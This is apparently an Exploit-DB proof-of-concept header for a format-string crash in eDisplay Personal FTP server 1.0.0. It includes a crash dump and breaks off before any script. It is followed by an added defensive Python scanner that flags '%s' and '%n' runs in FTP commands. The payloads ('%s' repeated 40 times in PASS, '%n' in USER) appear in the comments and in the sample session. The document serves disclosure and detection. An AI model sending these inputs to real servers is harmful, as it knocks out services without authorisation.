# Title: eDisplay Personal FTP server 1.0.0 Pre-Authentication DoS (PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hats off to dookie2000ca
# Discovery date: 16/03/2010
# Software link: http://edisplay-personal-ftp-server.software.informer.com/
# Tested on: Windows XP SP3 Professional
# Nod to the Exploit-DB Team

# Vendor informed via email: 17/03/2010

#!/usr/bin/python

#Pre-Authentication crash #1
#I say crash number 1 since there's another instance where it crashes with the USER command.
#Many post-authentication commands also crash with the same buffer type (%n for example)
#with varying degrees of interesting CPU register overwrites.
#It will crash if you send it about 40 '%s' really, but I've included my full session of 810 bytes sent.
#As always, if anyone wants to take this further go right ahead. Just be nice and don't forget who found it.

#CONTEXT DUMP
# EIP: 7e4287aa mov dl,[eax]
# EAX: 73736150 (1936941392) -> N/A
# EBX: 0000000a ( 10) -> N/A
# ECX: 73736150 (1936941392) -> N/A
# EDX: 00000000 ( 0) -> N/A
# EDI: 0012c9a6 ( 1231270) -> P(9d%s%s%s%s%s%s%s%s%s%s...%s%s%s%s%s%s%s%s%s%:UBsSHs%:vHEs<;T (stack)
# ESI: 73736151 (1936941393) -> N/A
# EBP: 0012c8e4 ( 1231076) -> P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source,
# and whether this process is started automatically
# or under programmatic control.P(9d%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (stack)
# ESP: 0012c89c ( 1231004) -> 9HwC(J :^:{P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source, and whether this process is started automatically or under programmatic (stack)
# +00: 0139b8d0 ( 20560080) -> PWSOCK32.DLL (heap)
# +04: 77124880 (1997686912) -> N/A
# +08: 000000cd ( 205) -> N/A
# +0c: 00000000 ( 0) -> N/A
# +10: ffffffff (4294967295) -> N/A
# +14: 00000000 ( 0) -> N/A

#disasm around:
# 0x7e428794 push eax
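An added example from the defender's side, not part of the original PoC: it decodes register values like the EAX above (0x73736150 is the ASCII bytes "Pass" read little-endian, consistent with a %s conversion treating stack text as a pointer before mov dl,[eax] faulted) and flags FTP command lines whose argument carries %n or a long run of conversion specifiers. The sample session, the threshold of 8 and the function names are assumptions.

```python
import re
import struct

# printf-style conversion specifiers: flags, width, precision, length, conversion.
_SPEC_RE = re.compile(r"%[-+ #0]*\d*(?:\.\d*)?(?:hh|h|ll|l|L|z|j|t)?[diouxXeEfFgGcspn%]")

def classify_ftp_line(line, threshold=8):
    """Return (verb, specifier_count, has_percent_n, risk) for one FTP command line.

    'high': %n present (it writes memory) or >= threshold specifiers in the argument;
    the author reports ~40 '%s' suffice. 'low': a stray specifier such as a password
    that genuinely contains '%s'. 'none' otherwise. threshold=8 is an assumption.
    """
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    # '%%' is a literal percent sign, not a conversion, so it is dropped here.
    specs = [m.group(0) for m in _SPEC_RE.finditer(arg) if m.group(0) != "%%"]
    has_n = any(s.endswith("n") for s in specs)
    if has_n or len(specs) >= threshold:
        risk = "high"
    elif specs:
        risk = "low"
    else:
        risk = "none"
    return verb.upper(), len(specs), has_n, risk

def ascii_from_dword(value):
    """Decode a 32-bit little-endian register value as text, or None if not printable.

    EAX = 0x73736150 in the dump decodes to 'Pass', consistent with a %s conversion
    reading stack text (the '331 Password required' reply is visible there) as a pointer.
    """
    raw = struct.pack("<I", value)
    return raw.decode("ascii") if all(0x20 <= b < 0x7F for b in raw) else None

# Constructed sample session, not a capture from the real server.
SAMPLE_SESSION = [
    "USER anonymous",
    "PASS p%ssw0rd",      # benign password with one specifier
    "PASS " + "%s" * 40,  # the pre-auth pattern the PoC describes
    "USER %n%n%n",        # the %n variant noted for post-auth commands
    "PASS 100%% sure",    # escaped percent, not a conversion
]

def scan_session(lines):
    """Return [(verb, specifier_count, risk)] for every line of a session."""
    return [(v, n, r) for v, n, _, r in map(classify_ftp_line, lines)]

if __name__ == "__main__":
    print(scan_session(SAMPLE_SESSION))
    print(ascii_from_dword(0x73736150))  # Pass
```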